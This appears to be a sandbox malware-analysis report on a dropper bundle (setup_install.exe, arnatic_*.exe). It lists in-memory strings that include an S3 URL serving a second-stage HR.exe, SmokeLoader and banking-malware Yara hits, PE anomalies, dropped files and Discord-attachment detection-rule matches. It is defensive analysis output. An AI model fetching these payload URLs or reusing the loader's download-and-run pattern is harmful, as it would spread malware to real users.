Source: arnatic_5.exe, 00000013.00000003.390898314.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://zayech.s3.eu-west-1.amazonaws.com/
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	String found in binary or memory: https://zayech.s3.eu-west-1.amazonaws.com/A
Source: arnatic_5.exe, 00000013.00000003.409965913.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: https://zayech.s3.eu-west-1.amazonaws.com/HR.exe
Source: arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp	String found in binary or memory: https://zayech.s3.eu-west-1.amazonaws.com/HR.exe/&
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: https://zayech.s3.eu-west-1.amazonaws.com/HR.exeC:
Source: arnatic_5.exe, 00000013.00000003.409965913.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp	String found in binary or memory: https://zayech.s3.eu-west-1.amazonaws.com/HR.exeRI
Source: arnatic_5.exe, 00000013.00000003.409965913.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp	String found in binary or memory: https://zayech.s3.eu-west-1.amazonaws.com/HR.exer
Source: arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://zayech.s3.eu-west-1.amazonaws.com:80/HR.exe

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe

Code function: 15_2_0040B048 __EH_prolog3_GS,DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

15_2_0040B048

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 0000002D.00000002.765127683.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.443693776.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.765437481.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.704126944.0000000002E01000.00000020.00020000.sdmp, type: MEMORY

Source: arnatic_3.exe, 0000000F.00000000.323836976.0000000000CDA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara Genericmalware

Show sources

Source: Yara match	File source: C:\Users\user\Documents\RcGzT5XRuDFwXkIj8ZcXjhgH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands:

Yara detected SmartSearch nstaller

Show sources

Source: Yara match

File source: 00000031.00000002.584879156.0000000002F70000.00000040.00000001.sdmp, type: MEMORY

System Summary:

PE file has a writeable .text section

Show sources

Source: setup_install.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
Source: libstdc++-6.dll.1.dr	Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
Source: libcurl.dll.1.dr	Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
Source: libcurlpp.dll.1.dr	Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ

PE file contains section with special chars

Show sources

Source: arnatic_6.txt.1.dr

Static PE information: section name: !AHg.#

PE file has nameless sections

Show sources

Source: arnatic_6.txt.1.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6764 -s 1092

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_0040BD85	1_2_0040BD85
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00403101	1_2_00403101
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00410138	1_2_00410138
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_004192A1	1_2_004192A1
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_0041937B	1_2_0041937B
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00416C70	1_2_00416C70
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00416536	1_2_00416536
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00417EC0	1_2_00417EC0
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00413ED0	1_2_00413ED0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004471E0	7_2_004471E0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0043C1A0	7_2_0043C1A0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00431240	7_2_00431240
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00432260	7_2_00432260
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004112C0	7_2_004112C0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0040D340	7_2_0040D340
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0040D300	7_2_0040D300
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0043E3E0	7_2_0043E3E0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00415380	7_2_00415380
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00442410	7_2_00442410
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00419520	7_2_00419520
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0043B6A0	7_2_0043B6A0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0044E870	7_2_0044E870
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00451870	7_2_00451870
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004148E0	7_2_004148E0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0040B8F0	7_2_0040B8F0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00441950	7_2_00441950
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00443A10	7_2_00443A10
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00412B70	7_2_00412B70
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0043EB90	7_2_0043EB90
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0040DBA0	7_2_0040DBA0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0043CC50	7_2_0043CC50
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0043DC50	7_2_0043DC50
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0043AC70	7_2_0043AC70
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00434C10	7_2_00434C10
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0042DD20	7_2_0042DD20
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00416DB0	7_2_00416DB0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0047E2DC	15_2_0047E2DC
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0042E2FC	15_2_0042E2FC
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_004543D0	15_2_004543D0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_004783F0	15_2_004783F0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00442470	15_2_00442470
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0045A489	15_2_0045A489
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00438570	15_2_00438570
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00468530	15_2_00468530
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_004165AB	15_2_004165AB
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00426692	15_2_00426692
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00478885	15_2_00478885
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00478C23	15_2_00478C23
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00452C31	15_2_00452C31
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00478FF5	15_2_00478FF5
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0047F0D0	15_2_0047F0D0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00EAF5C0	19_2_00EAF5C0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E47F20	19_2_00E47F20
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E91F30	19_2_00E91F30
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E5F18B	19_2_00E5F18B
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E7BBF0	19_2_00E7BBF0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E5E3D0	19_2_00E5E3D0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E7DB6C	19_2_00E7DB6C
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E676C9	19_2_00E676C9
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E92650	19_2_00E92650
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E6BE00	19_2_00E6BE00
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E48FC0	19_2_00E48FC0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E59F50	19_2_00E59F50

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_2.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_3.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_5.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_5.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: arnatic_8.txt.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: appforpr2[1].exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: appforpr2[1].exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: appforpr2[1].exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: l7AR_7u5i2RZzKoKItslndOd.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: l7AR_7u5i2RZzKoKItslndOd.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: l7AR_7u5i2RZzKoKItslndOd.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qku3YiVhcZIcmDNEbDutTIoi.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HR[1].exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HR[1].exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HR[1].exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: file3[1].exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WpPIUPf_de3qhcU6Yb86wV8v.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WpPIUPf_de3qhcU6Yb86wV8v.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WpPIUPf_de3qhcU6Yb86wV8v.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zCgmVlJU85h7EoUzOQ69Wnzh.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Section loaded: libcurlpp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Section loaded: libgcc_s_dw2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Section loaded: libgcc_s_dw2-1.dll	Jump to behavior

Source: libstdc++-6.dll.1.dr	Static PE information: Number of sections : 12 > 10
Source: setup_install.exe.1.dr	Static PE information: Number of sections : 18 > 10
Source: libcurlpp.dll.1.dr	Static PE information: Number of sections : 18 > 10
Source: libcurl.dll.1.dr	Static PE information: Number of sections : 19 > 10

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 19.3.arnatic_5.exe.3f90944.32.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.3f90944.79.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.arnatic_4.exe.d30000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.3f8fd2c.31.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.3.0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe.240787c.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.96.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.3f90944.78.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.93.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.3f8fd2c.29.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.3f8fd2c.77.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.85.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.84.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.646a8c0.65.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.92.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.646a8c0.25.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.646a8c0.72.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.86.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.646a8c0.55.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.3.arnatic_5.exe.64748d0.90.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
